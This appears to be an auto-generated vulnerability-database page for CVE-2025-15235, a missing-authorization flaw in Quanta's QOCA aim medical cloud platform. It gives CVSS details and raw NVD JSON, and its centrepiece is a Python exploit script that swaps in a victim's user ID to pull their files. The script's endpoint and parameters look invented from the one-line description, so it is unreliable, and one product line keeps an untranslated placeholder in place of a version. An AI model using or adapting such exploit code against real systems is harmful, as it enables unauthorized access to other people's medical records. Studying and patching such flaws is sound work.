Security Vulnerability Report
中文
CVE-2025-15235 CVSS 6.5 MEDIUM

CVE-2025-15235

Published: 2026-01-05 08:15:57
Last Modified: 2026-01-20 21:12:38
Source: [email protected]

Description

QOCA aim AI Medical Cloud Platform developed by Quanta Computer has a Missing Authorization vulnerability, allowing authenticated remote attackers to modify specific network packet parameters, enabling certain system functions to access other users' files.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:quantatw:qoca_aim:*:*:*:*:*:*:*:* - VULNERABLE
QOCA aim AI Medical Cloud Platform < 修复版本
Quanta Computer QOCA aim 医疗云平台(所有未修补版本)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-15235 PoC - QOCA aim AI Medical Cloud Platform Missing Authorization # This PoC demonstrates accessing other users' files via modified network packet parameters import requests import json TARGET_URL = "https://vulnerable-server/qoca-aim/api" ATTACKER_TOKEN = "attacker_auth_token_here" TARGET_USER_ID = "victim_user_id_here" def exploit_missing_authorization(): """ Exploit CVE-2025-15235 by modifying network packet parameters to access other users' files without proper authorization. """ headers = { "Authorization": f"Bearer {ATTACKER_TOKEN}", "Content-Type": "application/json" } # Step 1: Normal file access request (attacker owns this file) normal_payload = { "action": "getFile", "fileId": "attacker_file_123", "userId": "attacker_user" } # Step 2: Malicious request - modify userId to access victim's files malicious_payload = { "action": "getFile", "fileId": "victim_file_456", "userId": TARGET_USER_ID # Unauthorized access to victim's files } try: response = requests.post(f"{TARGET_URL}/files", headers=headers, json=malicious_payload) if response.status_code == 200: data = response.json() if "fileData" in data: print("[+] SUCCESS: Unauthorized file access achieved!") print(f"[+] Retrieved file data: {data['fileData']}") return True else: print(f"[-] Request failed: {response.status_code}") return False except requests.exceptions.RequestException as e: print(f"[-] Connection error: {e}") return False if __name__ == "__main__": print("CVE-2025-15235 - QOCA aim AI Medical Cloud Platform PoC") print("=" * 60) exploit_missing_authorization()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-15235", "sourceIdentifier": "[email protected]", "published": "2026-01-05T08:15:57.237", "lastModified": "2026-01-20T21:12:38.050", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "QOCA aim AI Medical Cloud Platform developed by Quanta Computer has a Missing Authorization vulnerability, allowing authenticated remote attackers to modify specific network packet parameters, enabling certain system functions to access other users' files."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-862"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:quantatw:qoca_aim:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.7.6", "matchCriteriaId": "4D325141-836B-4D68-87D4-9E4BD8F2A80F"}]}]}], "references": [{"url": "https://www.twcert.org.tw/en/cp-139-10616-cd942-2.html", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://www.twcert.org.tw/tw/cp-132-10615-157a3-1.html", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.